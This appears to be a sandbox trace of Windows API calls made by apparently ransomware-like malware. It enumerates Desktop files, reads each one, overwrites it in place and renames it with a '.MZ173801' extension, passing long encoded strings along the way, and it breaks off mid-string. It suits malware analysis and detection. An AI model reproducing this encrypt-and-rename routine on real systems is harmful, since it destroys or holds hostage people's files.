GetCurrentThreadId () returned 0x1358 [0122.877] GetCurrentThreadId () returned 0x1358 [0122.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.878] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.878] GetCurrentThreadId () returned 0x1358 [0122.878] GetCurrentThreadId () returned 0x1358 [0122.878] GetCurrentThreadId () returned 0x1358 [0122.878] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4zq3s7.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\4zq3s7.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.878] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.878] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.878] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xaf4b [0122.879] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.879] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xaf4b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xaf4b, lpOverlapped=0x0) returned 1 [0122.880] CloseHandle (hObject=0x410) returned 1 [0122.880] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\4zq3s7.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\4zq3s7.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.882] WriteFile (in: hFile=0x410, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xaf4b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f9bc*=0xaf4b, lpOverlapped=0x0) returned 1 [0122.931] CloseHandle (hObject=0x410) returned 1 [0122.932] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\4zq3s7.swf" (normalized: "c:\\users\\fd1hvy\\desktop\\4zq3s7.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\4zq3s7.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\4zq3s7.swf.mz173801")) returned 1 [0122.932] GetCurrentThreadId () returned 0x1358 [0122.932] GetCurrentThreadId () returned 0x1358 [0122.932] GetCurrentThreadId () returned 0x1358 [0122.932] GetCurrentThreadId () returned 0x1358 [0122.932] GetCurrentThreadId () returned 0x1358 [0122.932] GetCurrentThreadId () returned 0x1358 [0122.932] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13e3ad60, ftCreationTime.dwHighDateTime=0x1d5e791, ftLastAccessTime.dwLowDateTime=0xe18beb80, ftLastAccessTime.dwHighDateTime=0x1d5eb1d, ftLastWriteTime.dwLowDateTime=0xe18beb80, ftLastWriteTime.dwHighDateTime=0x1d5eb1d, nFileSizeHigh=0x0, nFileSizeLow=0x119c0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7s8kn42gORboEByd jhc.mkv", cAlternateFileName="7S8KN4~1.MKV")) returned 1 [0122.932] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.932] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\7s8kn42gORboEByd jhc.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\7s8kn42gorboebyd jhc.mkv"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13e3ad60, ftCreationTime.dwHighDateTime=0x1d5e791, ftLastAccessTime.dwLowDateTime=0xe18beb80, ftLastAccessTime.dwHighDateTime=0x1d5eb1d, ftLastWriteTime.dwLowDateTime=0xe18beb80, ftLastWriteTime.dwHighDateTime=0x1d5eb1d, nFileSizeHigh=0x0, nFileSizeLow=0x119c0)) returned 1 [0122.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.933] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0122.933] GetCurrentThreadId () returned 0x1358 [0122.933] GetCurrentThreadId () returned 0x1358 [0122.933] GetCurrentThreadId () returned 0x1358 [0122.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.934] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0122.934] GetCurrentThreadId () returned 0x1358 [0122.934] GetCurrentThreadId () returned 0x1358 [0122.934] GetCurrentThreadId () returned 0x1358 [0122.934] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7s8kn42gORboEByd jhc.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\7s8kn42gorboebyd jhc.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.934] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0122.934] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.934] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x119c0 [0122.934] SetFilePointer (in: hFile=0x410, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0122.934] ReadFile (in: hFile=0x410, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x119c0, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x119c0, lpOverlapped=0x0) returned 1 [0122.936] CloseHandle (hObject=0x410) returned 1 [0122.937] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\7s8kn42gORboEByd jhc.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\7s8kn42gorboebyd jhc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0122.938] WriteFile (in: hFile=0x410, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x119c0, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19f9bc*=0x119c0, lpOverlapped=0x0) returned 1 [0122.940] CloseHandle (hObject=0x410) returned 1 [0122.940] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\7s8kn42gORboEByd jhc.mkv" (normalized: "c:\\users\\fd1hvy\\desktop\\7s8kn42gorboebyd jhc.mkv"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\7s8kn42gORboEByd jhc.mkv.MZ173801" (normalized: "c:\\users\\fd1hvy\\desktop\\7s8kn42gorboebyd jhc.mkv.mz173801")) returned 1 [0122.941] GetCurrentThreadId () returned 0x1358 [0122.941] GetCurrentThreadId () returned 0x1358 [0122.941] GetCurrentThreadId () returned 0x1358 [0122.941] GetCurrentThreadId () returned 0x1358 [0122.941] GetCurrentThreadId () returned 0x1358 [0122.941] GetCurrentThreadId () returned 0x1358 [0122.941] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6081d0, ftCreationTime.dwHighDateTime=0x1d5ef01, ftLastAccessTime.dwLowDateTime=0x6cae350, ftLastAccessTime.dwHighDateTime=0x1d5e921, ftLastWriteTime.dwLowDateTime=0x6cae350, ftLastWriteTime.dwHighDateTime=0x1d5e921, nFileSizeHigh=0x0, nFileSizeLow=0xf0b1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="93FAioEJ-r.bmp", cAlternateFileName="93FAIO~1.BMP")) returned 1 [0122.941] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0122.941] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0122.941] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\93FAioEJ-r.bmp" (normalized: "c:\\users\\fd1hvy\\desktop\\93faioej-r.bmp"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f6081d0, ftCreationTime.dwHighDateTime=0x1d5ef01, ftLastAccessTime.dwLowDateTime=0x6cae350, ftLastAccessTime.dwHighDateTime=0x1d5e921, ftLastWriteTime.dwLowDateTime=0x6cae350, ftLastWriteTime.dwHighDateTime=0x1d5e921, nFileSizeHigh=0x0, nFileSizeLow=0xf0b1)) returned 1 [0122.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0122.942] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ